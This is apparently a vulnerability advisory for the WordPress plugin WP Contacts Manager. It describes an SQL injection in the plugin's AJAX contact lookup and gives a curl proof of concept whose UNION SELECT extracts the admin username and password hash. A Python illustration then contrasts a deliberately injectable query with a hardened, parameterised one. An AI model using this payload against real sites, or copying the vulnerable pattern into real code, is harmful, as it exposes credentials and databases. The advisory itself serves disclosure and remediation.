The plugin fails to properly sanitize user-supplied POST data before interpolating it into an SQL statement and executing it, leading to an SQL injection vulnerability.
```
curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'
```
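The flaw described above, next to a corrected handler, as an added example that is not the plugin's code: Python with an in-memory SQLite table stands in for WordPress and its database layer, and the table, function names and sample requests are constructed for illustration. In WordPress itself the corresponding fix is to bind the value through `$wpdb->prepare()` with a `%d` placeholder.

```python
import json
import sqlite3

def make_db():
    """Constructed stand-in for the plugin's contacts table (not its real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    db.executemany("INSERT INTO contacts VALUES (?, ?, ?)",
                   [(1, "Alice", "alice@example.test"),
                    (2, "Bob", "bob@example.test")])
    return db

def get_contact_vulnerable(db, body):
    """Flawed pattern: the JSON 'id' value becomes part of the SQL text."""
    contact_id = json.loads(body)["id"]
    sql = "SELECT id, name, email FROM contacts WHERE id = '%s'" % contact_id
    return db.execute(sql).fetchall()

def get_contact_hardened(db, body):
    """Validate the type of 'id', then pass it as a bound parameter."""
    try:
        contact_id = json.loads(body).get("id")
    except (ValueError, AttributeError):
        raise ValueError("malformed request body")
    # Accept a JSON integer or an all-digit ASCII string, nothing else.
    if isinstance(contact_id, bool) or not isinstance(contact_id, (int, str)):
        raise ValueError("id must be an integer")
    if isinstance(contact_id, str) and not (contact_id.isascii() and contact_id.isdigit()):
        raise ValueError("id must be an integer")
    value = int(contact_id)
    if not 0 < value < 2**63:  # stay inside the column's integer range
        raise ValueError("id out of range")
    # The driver sends the value separately; it can never change the query shape.
    return db.execute("SELECT id, name, email FROM contacts WHERE id = ?",
                      (value,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    crafted = json.dumps({"id": "1' OR '1'='1"})  # constructed input with a quote
    print("vulnerable:", get_contact_vulnerable(db, crafted))  # every row comes back
    try:
        get_contact_hardened(db, crafted)
    except ValueError as exc:
        print("hardened rejected request:", exc)
    print("hardened:", get_contact_hardened(db, json.dumps({"id": "1"})))
```
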
CPE

Name | Operator | Version |
---|---|---|
wp-contacts-manager | eq | * |